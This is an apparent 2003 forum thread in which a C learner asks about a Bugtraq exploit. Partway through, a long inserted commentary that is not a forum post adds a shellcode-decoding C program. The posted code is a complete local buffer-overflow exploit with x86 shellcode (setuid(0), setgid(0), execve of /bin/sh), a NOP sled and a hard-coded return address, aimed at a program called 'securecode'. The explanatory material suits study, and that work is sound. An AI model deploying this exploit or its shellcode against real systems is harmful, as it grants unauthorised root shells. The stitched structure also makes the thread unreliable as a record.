\xcd\x80 \xb0\x17 ..experienced programmer please help


Imin
08-31-2003, 07:50 PM
Hi,
Here's part of a C source file I took from the Bugtraq mailing list. I'm currently learning C, so I'd like to ask a few things... I really, really hope you guys and gals out there can help me :)

#include <stdio.h>
#include <stdlib.h>   /* atol */
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */

/* kode ripped from kon2.c */

/* Linux/x86 shellcode. Each string literal is the raw machine code for the
 * instruction named in the comment beside it; the sequence performs
 * setuid(0); setgid(0); execve("/bin//sh", ...); exit(0); via int $0x80. */
char codez[] =
/* setuid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x17" /* mov $0x17,%al   -> syscall 23, setuid */
"\xcd\x80" /* int $0x80 */
/* setgid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x2e" /* mov $0x2e,%al   -> syscall 46, setgid */
"\xcd\x80" /* int $0x80 */
/* /bin/sh execve(); */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax         NUL terminator for the path string */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f   "//sh" */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f   "/bin" */
"\x89\xe3" /* mov %esp,%ebx     ebx = "/bin//sh" */
"\x50" /* push %eax         argv[1] = NULL */
"\x53" /* push %ebx         argv[0] = path */
"\x89\xe1" /* mov %esp,%ecx     ecx = argv */
"\x31\xd2" /* xor %edx,%edx     edx = envp = NULL */
"\xb0\x0b" /* mov $0xb,%al    -> syscall 11, execve */
"\xcd\x80" /* int $0x80 */
/* exit(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x01" /* mov $0x01,%al   -> syscall 1, exit */
"\xcd\x80"; /* int $0x80 */

#define NOP 0x90
#define LEN 289
#define RET 0xbffff314 //Mandrake 9.1 offset

int main(int argc, char *argv[]) {

    /* A few spare bytes: the fill loop below stores whole longs, so the
     * last store at i = 288 runs past LEN, and the terminating NUL needs
     * a slot as well. The file written is still exactly LEN bytes. */
    char buffer[LEN + sizeof(long)];
    long retaddr, offset;
    int i;
    FILE *fp;

    offset = 0;
    if (argc > 1) {
        offset = atol(argv[1]);
    }
    retaddr = RET + offset;

    printf("\n Modified by j0e! Original code from:");
    printf("\n- (c) teleh0r@doglover.com anno 2000 -\n");
    printf("Use : %s [offset] \n", argv[0]);
    printf("Using: address 0x%lx\n\n", retaddr);

    /* Fill the whole buffer with the guessed return address, 4 bytes at a
     * time (assumes a 32-bit target, where sizeof(long) == 4). */
    for (i = 0; i < LEN; i += 4)
        *(long *) &buffer[i] = retaddr;

    /* Overwrite the front with a NOP sled. The larger the constant
     * subtracted from strlen(codez) (40 here), the more copies of the
     * return address stay at the end and the fewer NOPs at the beginning. */
    for (i = 0; i < (LEN - strlen(codez) - 40); ++i)
        *(buffer + i) = NOP;

    /* Shellcode goes right after the sled; the last 40 bytes keep the
     * return address copies that are meant to land on the saved EIP. */
    memcpy(buffer + i, codez, strlen(codez));
    buffer[LEN] = '\0';   /* so fprintf("%s") stops at exactly LEN bytes */

    fp = fopen("bigbuff", "w");
    if (fp == NULL) {
        perror("bigbuff");
        return 1;
    }
    fprintf(fp, "%s", buffer);
    fclose(fp);

    /* Hand the payload file to the vulnerable program; the argument list
     * must end with a null pointer, not a plain 0. */
    execl("./securecode", "securecode", "-s", "bigbuff", (char *)0);

    return 0;
}

What are all these things for?

char codez[] =
/* setuid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x17" /* mov $0x17,%al */
"\xcd\x80" /* int $0x80 */
/* setgid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x2e" /* mov $0x2e,%al */
"\xcd\x80" /* int $0x80 */
/* /bin/sh execve(); */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80" /* int $0x80 */
/* exit(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x01" /* mov $0x01,%al */
"\xcd\x80";

Please explain to me, in brief and in detail, what those \x89/\xd8 bla bla things are all about...
because I don't think I could find these things in any C book :confused:

Thanks a lot

kshim5
08-31-2003, 08:19 PM
It looks like an array of Assembly directives.

Imin
08-31-2003, 09:05 PM
:confused:

Can you please explain further?

sploo22
08-31-2003, 09:30 PM
Assembly language is a human-readable notation for the low-level instructions that are executed by the processor. Basically, the array at the beginning of the program is machine language, but it is being treated as an array of bytes.

The rest of the code is a program that writes this data into a file and executes a program called "securecode" using this file as an argument.

Edit: This actually looks like some sort of security exploit to me. This isn't exactly the sort of thing I'd recommend to someone just learning C...
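To make the "machine code treated as an array" point concrete, here is an added example (not code from the thread or from the original exploit author): a decoder for just the handful of x86 opcodes that appear in the posted shellcode. It walks the bytes, prints the same AT&T mnemonics the post's comments show, keeps a simulated %eax so every int $0x80 can be labelled with the Linux 32-bit syscall number it invokes, and reassembles the string built by the two push $imm32 instructions. The syscall name table and the simplified register model are assumptions of this example; anything outside the subset of opcodes actually used stops the decoder.

```c
/* Added example: decode the posted x86 shellcode back into mnemonics,
 * recover the syscall sequence and the pushed "/bin//sh" string. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Constructed copy of the shellcode bytes from the post (the C string
 * literal adds a trailing NUL, which is why sizeof - 1 is used below). */
static const unsigned char codez[] =
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"              /* setuid(0)  */
    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"              /* setgid(0)  */
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" /* execve */
    "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";             /* exit(0)    */

/* ModRM reg/rm field encoding order for 32-bit registers. */
static const char *reg32[8] = {"eax","ecx","edx","ebx","esp","ebp","esi","edi"};

/* Simplified machine state: a register file (only %eax really matters for
 * syscall numbers) and the bytes pushed by "push $imm32", in memory order. */
struct cpu {
    uint32_t r[8];
    char     s[64];
    size_t   slen;
};

/* Decode one instruction at p (n bytes left). Writes the AT&T mnemonic to
 * out, updates the simulated cpu and returns the instruction length, or 0
 * if the opcode is outside the tiny subset this decoder knows about. */
static size_t decode_one(const unsigned char *p, size_t n, struct cpu *c,
                         char *out, size_t outlen)
{
    unsigned op, mod, reg, rm;
    uint32_t imm;
    if (n == 0) return 0;
    op = p[0];
    if ((op == 0x31 || op == 0x89) && n >= 2) {   /* xor/mov r/m32,r32 */
        mod = p[1] >> 6; reg = (p[1] >> 3) & 7; rm = p[1] & 7;
        if (mod != 3) return 0;                    /* register-direct only */
        if (op == 0x31) c->r[rm] ^= c->r[reg]; else c->r[rm] = c->r[reg];
        snprintf(out, outlen, "%s %%%s,%%%s", op == 0x31 ? "xor" : "mov",
                 reg32[reg], reg32[rm]);
        return 2;
    }
    if (op == 0xb0 && n >= 2) {                    /* mov $imm8,%al */
        c->r[0] = (c->r[0] & 0xffffff00u) | p[1];
        snprintf(out, outlen, "mov $0x%x,%%al", p[1]);
        return 2;
    }
    if (op == 0xcd && n >= 2) {                    /* int $imm8 */
        snprintf(out, outlen, "int $0x%x", p[1]);
        return 2;
    }
    if (op >= 0x50 && op <= 0x57) {                /* push %r32 */
        snprintf(out, outlen, "push %%%s", reg32[op - 0x50]);
        return 1;
    }
    if (op == 0x68 && n >= 5) {                    /* push $imm32 */
        imm = p[1] | p[2] << 8 | p[3] << 16 | (uint32_t)p[4] << 24;
        if (c->slen + 4 <= sizeof c->s) {
            memmove(c->s + 4, c->s, c->slen);      /* stack grows down: */
            memcpy(c->s, p + 1, 4);                /* newest push is lowest */
            c->slen += 4;
        }
        snprintf(out, outlen, "push $0x%08x", imm);
        return 5;
    }
    return 0;
}

/* Assumed name table, only for the syscalls this shellcode uses. */
static const char *syscall_name(int nr)
{
    switch (nr) {
    case 1:  return "exit";
    case 11: return "execve";
    case 23: return "setuid";
    case 46: return "setgid";
    default: return "?";
    }
}

/* Walk the whole buffer, printing a listing. Every "int $0x80" records the
 * value of %eax at that point in nums[]. Returns how many were found, or
 * -1 if an unknown opcode was hit before the end of the buffer. */
static int syscall_trace(const unsigned char *code, size_t n,
                         int *nums, int max, struct cpu *c)
{
    size_t off = 0, len;
    int found = 0;
    char text[48];
    memset(c, 0, sizeof *c);
    while (off < n) {
        len = decode_one(code + off, n - off, c, text, sizeof text);
        if (len == 0) return -1;
        printf("%04zx: %-22s", off, text);
        if (code[off] == 0xcd && code[off + 1] == 0x80) {
            if (found < max) nums[found++] = (int)c->r[0];
            printf("  ; syscall %u (%s)", (unsigned)c->r[0],
                   syscall_name((int)c->r[0]));
        }
        putchar('\n');
        off += len;
    }
    return found;
}

int main(void)
{
    struct cpu c;
    int nums[8], k, i;
    k = syscall_trace(codez, sizeof codez - 1, nums, 8, &c);
    printf("\n%d syscalls:", k);
    for (i = 0; i < k; i++) printf(" %d", nums[i]);
    printf("\npushed string: \"%.*s\"\n", (int)c.slen, c.s);
    return 0;
}
```

The listing reproduces the comments in the post, and the trace shows why the comments say setuid, setgid, execve and exit: the only thing that changes between the int $0x80 instructions is the byte loaded into %al, which is the syscall number the kernel dispatches on. The string comes out as "/bin//sh" because the second push lands below the first on the stack; the doubled slash is just a way to get an 8-byte, NUL-free path.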

Imin
08-31-2003, 10:28 PM
Ooooh.

Actually, I haven't really just started learning C... it's been nearly 2 years already :D. I can now program in C, C++, Visual Basic and Java, but every time I see that kind of code I get confused... I never recall learning anything like that, and my curiosity arises :p. Hmm, thanks a lot... btw, can you tell me where I can learn more about those things?

kshim5
08-31-2003, 10:36 PM
Main documentation page

http://hybd.net/~mms/nasm/docs/nasmdoc0.html

Imin
08-31-2003, 10:40 PM
Thanks a lot... that will surely explain a lot :cool: